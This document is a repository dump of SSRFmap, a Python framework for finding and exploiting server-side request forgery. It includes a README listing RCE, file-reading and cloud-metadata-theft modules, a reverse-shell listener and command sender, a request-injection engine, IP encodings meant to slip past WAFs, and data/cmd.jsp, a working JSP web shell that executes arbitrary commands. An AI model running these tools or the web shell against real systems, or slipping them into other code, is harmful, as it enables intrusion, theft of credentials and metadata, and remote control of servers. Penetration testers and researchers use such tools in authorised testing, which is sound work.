├── .github └── FUNDING.yml ├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── core ├── handler.py ├── requester.py ├── ssrf.py └── utils.py ├── data ├── cmd.jsp └── ports ├── examples ├── curl-7.71.0.tar.gz ├── example.py ├── request.txt ├── request2.txt ├── request3.txt ├── request4.txt ├── request5.txt ├── request6.txt └── ssrf_dns.py ├── handlers └── http.py ├── modules ├── alibaba.py ├── aws.py ├── axfr.py ├── consul.py ├── custom.py ├── digitalocean.py ├── docker.py ├── fastcgi.py ├── gce.py ├── github.py ├── httpcollaborator.py ├── memcache.py ├── mysql.py ├── networkscan.py ├── portscan.py ├── postgres.py ├── readfiles.py ├── redis.py ├── smbhash.py ├── smtp.py ├── socksproxy.py ├── template.py ├── tomcat.py └── zabbix.py ├── requirements.txt ├── screenshot ├── networkscan_example_ssrf.png ├── readfiles_example_ssrf.png └── tomcat_example_ssrf.png └── ssrfmap.py /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: swisskyrepo 4 | ko_fi: swissky # Replace with a single Ko-fi username 5 | custom: https://www.buymeacoffee.com/swissky 6 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | TODO/ 4 | TODO.md 5 | *.py[cod] 6 | *$py.class 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | .eggs/ 19 | lib/ 20 | lib64/ 21 | parts/ 22 | sdist/ 23 | var/ 24 | wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | .hypothesis/ 50 | .pytest_cache/ 51 | 52 | # Translations 53 | *.mo 54 | *.pot 55 | 56 | # Django stuff: 57 | *.log 58 | local_settings.py 59 | db.sqlite3 60 | 61 | # Flask stuff: 62 | instance/ 63 | .webassets-cache 64 | 65 | # Scrapy stuff: 66 | .scrapy 67 | 68 | # Sphinx documentation 69 | docs/_build/ 70 | 71 | # PyBuilder 72 | target/ 73 | 74 | # Jupyter Notebook 75 | .ipynb_checkpoints 76 | 77 | # pyenv 78 | .python-version 79 | 80 | # celery beat schedule file 81 | celerybeat-schedule 82 | 83 | # SageMath parsed files 84 | *.sage.py 85 | 86 | # Environments 87 | .env 88 | .venv 89 | env/ 90 | venv/ 91 | ENV/ 92 | env.bak/ 93 | venv.bak/ 94 | 95 | # Spyder project settings 96 | .spyderproject 97 | .spyproject 98 | 99 | # Rope project settings 100 | .ropeproject 101 | 102 | # mkdocs documentation 103 | /site 104 | 105 | # mypy 106 | .mypy_cache/ 107 | 108 | # artifacts 109 | 127.0.0.1_5000/ 110 | SSRFmap.log -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.12.4-alpine 2 | 3 | WORKDIR /usr/src/app 4 | COPY . /usr/src/app 5 | 6 | RUN apk update 7 | 8 | # Install curl with outdated libcurl 9 | RUN apk add --update build-base cmake c-ares-dev 10 | RUN cp examples/curl-7.71.0.tar.gz /tmp 11 | RUN tar -xvf /tmp/curl-7.71.0.tar.gz -C /tmp/ 12 | RUN cd /tmp/curl-7.71.0 && ./configure --enable-ares && make && make install 13 | 14 | # Install requirements 15 | RUN pip install -r requirements.txt 16 | 17 | # Downgrade privileges 18 | USER 1000 19 | 20 | ENTRYPOINT ["python3"] -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Swissky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SSRFmap [![Python 3.4+](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/) 2 | 3 | 4 | SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz. 5 | 6 | > Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. 7 | 8 | ## Summary 9 | 10 | * [Modules](#modules) 11 | * [Install and Manual](#install-and-manual) 12 | * [Examples](#examples) 13 | * [SSRFmap - Tests](#ssrfmap-tests) 14 | * [Contribute](#contribute) 15 | * [Contributors](#thanks-to-the-contributors) 16 | 17 | 18 | ## Modules 19 | 20 | The following modules are already implemented and can be used with the `-m` argument. 21 | 22 | | Name | Description | 23 | | :------------- | :------------------------------------------------------- | 24 | | `axfr` | DNS zone transfers (AXFR) | 25 | | `fastcgi` | FastCGI RCE | 26 | | `redis` | Redis RCE | 27 | | `github` | Github Enterprise RCE < 2.8.7 | 28 | | `zabbix` | Zabbix RCE | 29 | | `mysql` | MySQL Command execution | 30 | | `postgres` | Postgres Command execution | 31 | | `docker` | Docker Infoleaks via API | 32 | | `smtp` | SMTP send mail | 33 | | `portscan` | Scan top 8000 ports for the host | 34 | | `networkscan` | HTTP Ping sweep over the network | 35 | | `readfiles` | Read files such as `/etc/passwd` | 36 | | `alibaba` | Read files from the provider (e.g: meta-data, user-data) | 37 | | `aws` | Read files from the provider (e.g: meta-data, user-data) | 38 | | `gce` | Read files from the provider (e.g: meta-data, user-data) | 39 | | `digitalocean` | Read files from the provider (e.g: meta-data, user-data) | 40 | | `socksproxy` | SOCKS4 Proxy | 41 | | `smbhash` | Force an SMB authentication via a UNC Path | 42 | | `tomcat` | Bruteforce attack against Tomcat Manager | 43 | | `custom` | Send custom data to a listening service, e.g: netcat | 44 | | `memcache` | Store data inside the memcache instance | 45 | 46 | 47 | ## Install and Manual 48 | 49 | * From the Github repository. 50 | ```powershell 51 | $ git clone https://github.com/swisskyrepo/SSRFmap 52 | $ cd SSRFmap/ 53 | $ pip3 install -r requirements.txt 54 | $ python3 ssrfmap.py 55 | 56 | usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER] 57 | [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] 58 | [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]] 59 | 60 | optional arguments: 61 | -h, --help show this help message and exit 62 | -r REQFILE SSRF Request file 63 | -p PARAM SSRF Parameter to target 64 | -m MODULES SSRF Modules to enable 65 | -l HANDLER Start an handler for a reverse shell 66 | -v [VERBOSE] Enable verbosity 67 | --lhost LHOST LHOST reverse shell or IP to target in the network 68 | --lport LPORT LPORT reverse shell or port to target in the network 69 | --uagent USERAGENT User Agent to use 70 | --ssl [SSL] Use HTTPS without verification 71 | --proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080) 72 | --level [LEVEL] Level of test to perform (1-5, default: 1) 73 | ``` 74 | 75 | * Docker 76 | ```powershell 77 | $ git clone https://github.com/swisskyrepo/SSRFmap 78 | $ docker build --no-cache -t ssrfmap . 79 | $ docker run -it ssrfmap ssrfmap.py [OPTIONS] 80 | $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py 81 | ``` 82 | 83 | 84 | ## Examples 85 | 86 | First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. 87 | They should look like the following. More examples are available in the **./examples** folder. 88 | 89 | ```powershell 90 | POST /ssrf HTTP/1.1 91 | Host: 127.0.0.1:5000 92 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 93 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 94 | Accept-Language: en-US,en;q=0.5 95 | Accept-Encoding: gzip, deflate 96 | Referer: http://mysimple.ssrf/ 97 | Content-Type: application/x-www-form-urlencoded 98 | Content-Length: 31 99 | Connection: close 100 | Upgrade-Insecure-Requests: 1 101 | 102 | url=https%3A%2F%2Fwww.google.fr 103 | ``` 104 | 105 | Use the `-m` followed by module name (separated by a `,` if you want to launch several modules). 106 | 107 | ```powershell 108 | # Launch a portscan on localhost and read default files 109 | python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan 110 | ``` 111 | 112 | If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name 113 | 114 | ```powershell 115 | python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test 116 | ``` 117 | 118 | If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`. 119 | 120 | ```powershell 121 | # Launch a portscan against an HTTPS endpoint using a custom user-agent 122 | python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" 123 | ``` 124 | 125 | Some modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell. 126 | 127 | ```powershell 128 | # Triggering a reverse shell on a Redis 129 | python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 130 | 131 | # -l create a listener for reverse shell on the specified port 132 | # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload 133 | ``` 134 | 135 | When the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter `--level`. 136 | 137 | ```powershell 138 | # --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ... 139 | ``` 140 | 141 | ## SSRFmap Tests 142 | 143 | A quick way to test the framework can be done with `data/example.py` SSRF service. 144 | 145 | * Local 146 | ```powershell 147 | FLASK_APP=examples/example.py flask run & 148 | python ssrfmap.py -r examples/request.txt -p url -m readfiles 149 | ``` 150 | 151 | * Docker 152 | ```ps1 153 | docker build --no-cache -t ssrfmap . 154 | 155 | # run example ssrf http service 156 | docker run -it -v "$(pwd)":/usr/src/app -p 5000:5000 ssrfmap examples/example.py 157 | 158 | # run example ssrf dns service 159 | docker exec -u root:root -it example python examples/ssrf_dns.py 160 | 161 | # run ssrfmap tool 162 | docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles 163 | ``` 164 | 165 | Launch the tests requests: 166 | 167 | ```ps1 168 | docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue 169 | docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue 170 | docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue 171 | docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue 172 | docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue 173 | docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue 174 | docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m axfr 175 | docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m axfr --lhost 127.0.0.1 --lport 53 --ldomain example.lab 176 | ``` 177 | 178 | 179 | ## Contribute 180 | 181 | I :heart: pull requests :) 182 | Feel free to add any feature listed below or a new service. 183 | - Redis PHP Exploitation 184 | - HTTP module (Jenkins ?) 185 | ```powershell 186 | gopher://:8080/_GET http:///x HTTP/1.1%0A%0A 187 | gopher://:8080/_POST%20http://:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body 188 | ``` 189 | 190 | The following code is a template if you wish to add a module interacting with a service. 191 | 192 | ```python 193 | from core.utils import * 194 | import logging 195 | 196 | name = "servicename in lowercase" 197 | description = "ServiceName RCE - What does it do" 198 | author = "Name or pseudo of the author" 199 | documentation = ["http://link_to_a_research", "http://another_link"] 200 | 201 | class exploit(): 202 | SERVER_HOST = "127.0.0.1" 203 | SERVER_PORT = "4242" 204 | 205 | def __init__(self, requester, args): 206 | logging.info("Module '{}' launched !".format(name)) 207 | 208 | # Handle args for reverse shell 209 | if args.lhost == None: self.SERVER_HOST = input("Server Host:") 210 | else: self.SERVER_HOST = args.lhost 211 | 212 | if args.lport == None: self.SERVER_PORT = input("Server Port:") 213 | else: self.SERVER_PORT = args.lport 214 | 215 | # Data for the service 216 | # Using a generator to create the host list 217 | # Edit the following ip if you need to target something else 218 | gen_host = gen_ip_list("127.0.0.1", args.level) 219 | for ip in gen_host: 220 | port = "6379" 221 | data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a" 222 | payload = wrapper_gopher(data, ip , port) 223 | 224 | # Handle args for reverse shell 225 | payload = payload.replace("SERVER_HOST", self.SERVER_HOST) 226 | payload = payload.replace("SERVER_PORT", self.SERVER_PORT) 227 | 228 | # Send the payload 229 | r = requester.do_request(args.param, payload) 230 | ``` 231 | 232 | You can also contribute with a beer IRL or via Github Sponsor button. 233 | 234 | ### Thanks to the contributors 235 | 236 |

237 | 238 | 239 | 240 |

241 | 242 | 243 | ## Inspired by 244 | 245 | - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) 246 | - [Blog on Gopherus Tool -SpyD3r](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) 247 | - [Gopherus - Github](https://github.com/tarunkant/Gopherus) 248 | - [SSRF testing - cujanovic](https://github.com/cujanovic/SSRF-Testing) 249 | -------------------------------------------------------------------------------- /core/handler.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | import time 4 | import logging 5 | 6 | class Handler(threading.Thread): 7 | 8 | def __init__(self, port): 9 | threading.Thread.__init__(self) 10 | logging.info(f"Handler listening on 0.0.0.0:{port}") 11 | self.connected = False 12 | self.port = int(port) 13 | 14 | def run(self): 15 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | self.socket.bind(('', self.port)) 17 | 18 | while True: 19 | self.socket.listen(5) 20 | self.client, address = self.socket.accept() 21 | print(f"Handler> New session from {address[0]}") 22 | self.connected = True 23 | 24 | response = self.client.recv(255) 25 | while response != b"": 26 | print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='') 27 | response = self.client.recv(255) 28 | 29 | def listen_command(self): 30 | if self.connected == True: 31 | cmd = input("Shell> $ ") 32 | if cmd == "exit": 33 | self.kill() 34 | print("BYE !") 35 | exit() 36 | self.send_command(cmd+"\n\n") 37 | 38 | def send_command(self, cmd): 39 | self.client.sendall(cmd.encode()) 40 | 41 | def kill(self): 42 | self.client.close() 43 | self.socket.close() -------------------------------------------------------------------------------- /core/requester.py: -------------------------------------------------------------------------------- 1 | import re 2 | import json 3 | import requests 4 | import logging 5 | import urllib.parse 6 | 7 | class Requester(object): 8 | protocol = "http" 9 | host = "" 10 | method = "" 11 | action = "" 12 | headers = {} 13 | data = {} 14 | 15 | def __init__(self, path, uagent, ssl, proxies): 16 | try: 17 | # Read file request 18 | with open(path, 'r') as f: 19 | content = f.read().strip() 20 | except IOError as e: 21 | logging.error("File not found") 22 | exit() 23 | 24 | try: 25 | content = content.split('\n') 26 | # Parse method and action URI 27 | regex = re.compile('(.*) (.*) HTTP') 28 | self.method, self.action = regex.findall(content[0])[0] 29 | 30 | # Parse headers 31 | for header in content[1:]: 32 | if header == '': 33 | # edge-case, when data is sent raw (json/xml) 34 | break 35 | name, _, value = header.partition(': ') 36 | if not name or not value: 37 | continue 38 | self.headers[name] = value 39 | self.host = self.headers['Host'] 40 | 41 | # Parse user-agent 42 | if uagent != None: 43 | self.headers['User-Agent'] = uagent 44 | 45 | # Parse data 46 | self.data_to_dict(content[-1]) 47 | 48 | # Handling HTTPS requests 49 | if ssl == True: 50 | self.protocol = "https" 51 | 52 | self.proxies = proxies 53 | 54 | except Exception as e: 55 | logging.warning("Bad Format or Raw data !") 56 | 57 | 58 | def data_to_dict(self, data): 59 | if self.method == "POST": 60 | 61 | # Handle JSON data 62 | if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']: 63 | self.data = json.loads(data) 64 | 65 | # Handle XML data 66 | elif self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']: 67 | self.data['__xml__'] = data 68 | 69 | # Handle FORM data 70 | else: 71 | for arg in data.split("&"): 72 | regex = re.compile('(.*)=(.*)') 73 | for name,value in regex.findall(arg): 74 | name = urllib.parse.unquote(name) 75 | value = urllib.parse.unquote(value) 76 | self.data[name] = value 77 | 78 | 79 | def do_request(self, param, value, timeout=3, stream=False): 80 | try: 81 | # Debug information 82 | logging.debug(f"Request param: {param}") 83 | logging.debug(f"Request value: {value}") 84 | logging.debug(f"Request timeout: {timeout}") 85 | 86 | # Handle injection in the headers 87 | # Copying data to avoid multiple variables edit 88 | header_injected = self.headers.copy() 89 | if param in header_injected: 90 | header_injected[param] = value 91 | logging.debug("Request inject: Injecting payload in HTTP Header") 92 | 93 | logging.debug(f"Request method: {self.method}") 94 | if self.method == "POST": 95 | 96 | # Copying data to avoid multiple variables edit 97 | data_injected = self.data.copy() 98 | 99 | if param in str(data_injected): # Fix for issue/10 : str(data_injected) 100 | data_injected[param] = value 101 | 102 | # Handle JSON data 103 | if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']: 104 | logging.debug("Request type: JSON") 105 | logging.debug(f"Request data: {data_injected}") 106 | 107 | r = requests.post( 108 | self.protocol + "://" + self.host + self.action, 109 | data=json.dumps(data_injected), 110 | headers=self.headers, 111 | timeout=timeout, 112 | stream=stream, 113 | verify=False, 114 | proxies=self.proxies 115 | ) 116 | 117 | # Handle XML data 118 | elif self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']: 119 | logging.debug("Request type: XML") 120 | 121 | if "*FUZZ*" in data_injected['__xml__']: 122 | logging.debug("Request inject: XML parameter") 123 | 124 | # replace the injection point with the payload 125 | data_xml = data_injected['__xml__'] 126 | data_xml = data_xml.replace('*FUZZ*', value) 127 | 128 | logging.debug(f"Request data: {data_xml}") 129 | r = requests.post( 130 | self.protocol + "://" + self.host + self.action, 131 | data=data_xml, 132 | headers=self.headers, 133 | timeout=timeout, 134 | stream=stream, 135 | verify=False, 136 | proxies=self.proxies 137 | ) 138 | 139 | else: 140 | logging.error("No injection point found ! (use -p)") 141 | exit(1) 142 | 143 | # Handle FORM data 144 | else: 145 | if param == '': 146 | logging.debug("Request inject: POST raw data") 147 | data_injected = value 148 | else: 149 | logging.debug("Request inject: POST parameter") 150 | 151 | r = requests.post( 152 | self.protocol + "://" + self.host + self.action, 153 | headers=header_injected, 154 | data=data_injected, 155 | timeout=timeout, 156 | stream=stream, 157 | verify=False, 158 | proxies=self.proxies 159 | ) 160 | 161 | else: 162 | logging.error("No injection point found ! (use -p)") 163 | exit(1) 164 | else: 165 | logging.debug("Request inject: GET parameter") 166 | 167 | # String is immutable, we don't have to do a "forced" copy 168 | regex = re.compile(param+"=([^&]+)") 169 | value = urllib.parse.quote(value, safe='') 170 | data_injected = re.sub(regex, param+'='+value, self.action) 171 | r = requests.get( 172 | self.protocol + "://" + self.host + data_injected, 173 | headers=header_injected, 174 | timeout=timeout, 175 | stream=stream, 176 | verify=False, 177 | proxies=self.proxies 178 | ) 179 | except Exception as e: 180 | logging.error(e) 181 | return None 182 | return r 183 | 184 | def __str__(self): 185 | text = self.method + " " 186 | text += self.action + " HTTP/1.1\n" 187 | for header in self.headers: 188 | text += header + ": " + self.headers[header] + "\n" 189 | 190 | text += "\n\n" 191 | for data in self.data: 192 | text += data + "=" + self.data[data] + "&" 193 | return text[:-1] 194 | -------------------------------------------------------------------------------- /core/ssrf.py: -------------------------------------------------------------------------------- 1 | from core.requester import Requester 2 | from core.handler import Handler 3 | from importlib.machinery import SourceFileLoader 4 | import os 5 | import time 6 | import logging 7 | from pathlib import Path 8 | 9 | 10 | class SSRF(object): 11 | modules = set() 12 | handler = None 13 | requester = None 14 | 15 | def __init__(self, args): 16 | 17 | # Set working dir to access all libraries 18 | self.change_current_dir() 19 | 20 | # Load modules in memory 21 | self.load_modules() 22 | 23 | # Start a reverse shell handler 24 | if args.handler and args.lport and args.handler == "1": 25 | handler = Handler(args.lport) 26 | handler.start() 27 | elif args.handler and args.lport: 28 | self.load_handler(args.handler) 29 | handler = self.handler.exploit(args.lport) 30 | handler.start() 31 | 32 | proxies = None 33 | if args.proxy: 34 | proxies = { 35 | "http" : args.proxy, 36 | "https" : args.proxy, 37 | } 38 | 39 | # Init a requester 40 | self.requester = Requester(args.reqfile, args.useragent, args.ssl, proxies) 41 | 42 | # NOTE: if args.param == None, target everything 43 | if args.param == None: 44 | logging.warning("No parameter (-p) defined, nothing will be tested!") 45 | 46 | # NOTE: if args.modules == None, try everything 47 | if args.modules == None: 48 | logging.warning("No modules (-m) defined, everything will be tested!") 49 | for module in self.modules: 50 | module.exploit(self.requester, args) 51 | else: 52 | for modname in args.modules.split(','): 53 | for module in self.modules: 54 | if module.name == modname: 55 | module.exploit(self.requester, args) 56 | break 57 | 58 | # Handling a shell 59 | while args.handler: 60 | handler.listen_command() 61 | time.sleep(5) 62 | 63 | def load_modules(self): 64 | for index,name in enumerate(os.listdir("./modules")): 65 | location = os.path.join("./modules", name) 66 | if ".py" in location: 67 | mymodule = SourceFileLoader(name, location).load_module() 68 | self.modules.add(mymodule) 69 | 70 | def load_handler(self, name): 71 | handler_file = f"{name}.py" 72 | try: 73 | location = os.path.join("./handlers", handler_file) 74 | self.handler = SourceFileLoader(handler_file, location).load_module() 75 | except Exception as e: 76 | logging.error(f"Invalid no such handler: {name}") 77 | exit(1) 78 | 79 | def change_current_dir(self): 80 | try: 81 | os.chdir(str(Path(__file__).resolve().parent.parent)) 82 | except PermissionError: 83 | print(logging.error(f"Error : Access to directory {new_directory} denied. Please verify that you have execute access.")) 84 | 85 | -------------------------------------------------------------------------------- /core/utils.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import string 4 | 5 | def wrapper_file(data): 6 | return f"file://{data}" 7 | 8 | def wrapper_unc(data, ip): 9 | return f"\\\\{ip}\\{data}" 10 | 11 | def wrapper_gopher(data, ip, port): 12 | return f"gopher://{ip}:{port}/_{data}" 13 | 14 | def wrapper_dict(data, ip, port): 15 | return f"dict://{data}:{ip}/{port}" 16 | 17 | def wrapper_http(data, ip, port, usernm=False, passwd=False): 18 | if usernm != False and passwd != False: 19 | return f"http://{usernm}:{passwd}@{ip}:{port}/{data}" 20 | return f"http://{ip}:{port}/{data}" 21 | 22 | def wrapper_https(data, ip, port): 23 | return f"https://{ip}:{port}/{data}" 24 | 25 | 26 | def diff_text(text1, text2): 27 | diff = "" 28 | for line in text1.split("\n"): 29 | if not line in text2: 30 | diff += line + "\n" 31 | return diff 32 | 33 | def ip_default_local(ips, ip): 34 | ips.add("127.0.0.1") 35 | ips.add("0.0.0.0") 36 | ips.add("localhost") 37 | 38 | def ip_default_shortcurt(ips, ip): 39 | ips.add("[::]") 40 | ips.add("0000::1") 41 | ips.add("0") 42 | ips.add("127.1") 43 | ips.add("127.0.1") 44 | 45 | def ip_default_cidr(ips, ip): 46 | ips.add("127.0.0.0") 47 | ips.add("127.0.1.3") 48 | ips.add("127.42.42.42") 49 | ips.add("127.127.127.127") 50 | 51 | 52 | def ip_decimal_notation(ips, ip): 53 | try: 54 | packedip = socket.inet_aton(ip) 55 | ips.add(struct.unpack("!l", packedip)[0]) 56 | except: 57 | pass 58 | 59 | 60 | def ip_dotted_decimal_with_overflow(ips, ip): 61 | try: 62 | ips.add(".".join([str(int(part) + 256) for part in ip.split(".")])) 63 | except: 64 | pass 65 | 66 | 67 | def ip_dotless_decimal(ips, ip): 68 | def octet_to_decimal_part(ip_part, octet): 69 | return int(ip_part) * (256 ** octet) 70 | 71 | try: 72 | parts = [part for part in ip.split(".")] 73 | ips.add(str(octet_to_decimal_part(parts[0], 3) + octet_to_decimal_part(parts[1], 2) + octet_to_decimal_part(parts[2], 1) + octet_to_decimal_part(parts[3], 0))) 74 | except: 75 | pass 76 | 77 | 78 | def ip_dotted_hexadecimal(ips, ip): 79 | def octet_to_hex_part(number): 80 | return str(hex(int(number))) 81 | 82 | try: 83 | ips.add(".".join([octet_to_hex_part(part) for part in ip.split(".")])) 84 | except: 85 | pass 86 | 87 | 88 | def ip_dotted_octal(ips, ip): 89 | def octet_to_oct_part(number): 90 | return str(oct(int(number))).replace("o","") 91 | 92 | try: 93 | ips.add(".".join([octet_to_oct_part(part) for part in ip.split(".")])) 94 | except: 95 | pass 96 | 97 | 98 | def ip_dotless_decimal_with_overflow(ips, ip): 99 | 100 | def octet_to_decimal_part(ip_part, octet): 101 | return int(ip_part) * (256 ** octet) 102 | 103 | try: 104 | parts = [part for part in ip.split(".")] 105 | ips.add(str(octet_to_decimal_part(parts[0], 3) + octet_to_decimal_part(parts[1], 2) + octet_to_decimal_part(parts[2], 1) + octet_to_decimal_part(parts[3], 0))) 106 | except: 107 | pass 108 | 109 | 110 | def ip_enclosed_alphanumeric(ips, ip): 111 | intab = "1234567890abcdefghijklmnopqrstuvwxyz" 112 | 113 | if ip == "127.0.0.1": 114 | ips.add("ⓛⓞⒸⒶⓛⓣⒺⓢⓣ.ⓜⒺ") 115 | 116 | outtab = "①②③④⑤⑥⑦⑧⑨⓪ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ" 117 | trantab = ip.maketrans(intab, outtab) 118 | ips.add( ip.translate(trantab) ) 119 | 120 | outtab = "①②③④⑤⑥⑦⑧⑨⓪ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ" 121 | trantab = ip.maketrans(intab, outtab) 122 | ips.add( ip.translate(trantab) ) 123 | 124 | def ip_dns_redirect(ips, ip): 125 | if ip == "127.0.0.1": 126 | ips.add("localtest.me") 127 | ips.add("customer1.app.localhost.my.company.127.0.0.1.nip.io") 128 | ips.add("localtest$google.me") 129 | 130 | if ip == "169.254.169.254": 131 | ips.add("metadata.nicob.net") 132 | ips.add("169.254.169.254.xip.io") 133 | ips.add("1ynrnhl.xip.io") 134 | 135 | def gen_ip_list(ip, level): 136 | ips = set() 137 | 138 | if level == 1: 139 | ips.add(ip) 140 | 141 | if level == 2: 142 | ip_default_local(ips, ip) 143 | ip_default_shortcurt(ips, ip) 144 | 145 | if level == 3: 146 | ip_dns_redirect(ips, ip) 147 | ip_default_cidr(ips, ip) 148 | 149 | if level == 4: 150 | ip_decimal_notation(ips, ip) 151 | ip_enclosed_alphanumeric(ips, ip) 152 | 153 | if level == 5: 154 | ip_dotted_decimal_with_overflow(ips, ip) 155 | ip_dotless_decimal(ips, ip) 156 | ip_dotless_decimal_with_overflow(ips, ip) 157 | ip_dotted_hexadecimal(ips, ip) 158 | ip_dotted_octal(ips, ip) 159 | 160 | for ip in ips: 161 | yield ip -------------------------------------------------------------------------------- /data/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | 3 |
4 | 5 | 6 |
7 | 
 8 | <%
 9 | if (request.getParameter("cmd") != null) {
10 |         out.println("Command: " + request.getParameter("cmd") + "
");
11 |         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
12 |         OutputStream os = p.getOutputStream();
13 |         InputStream in = p.getInputStream();
14 |         DataInputStream dis = new DataInputStream(in);
15 |         String disr = dis.readLine();
16 |         while ( disr != null ) {
17 |                 out.println(disr); 
18 |                 disr = dis.readLine(); 
19 |                 }
20 |         }
21 | %>
22 |
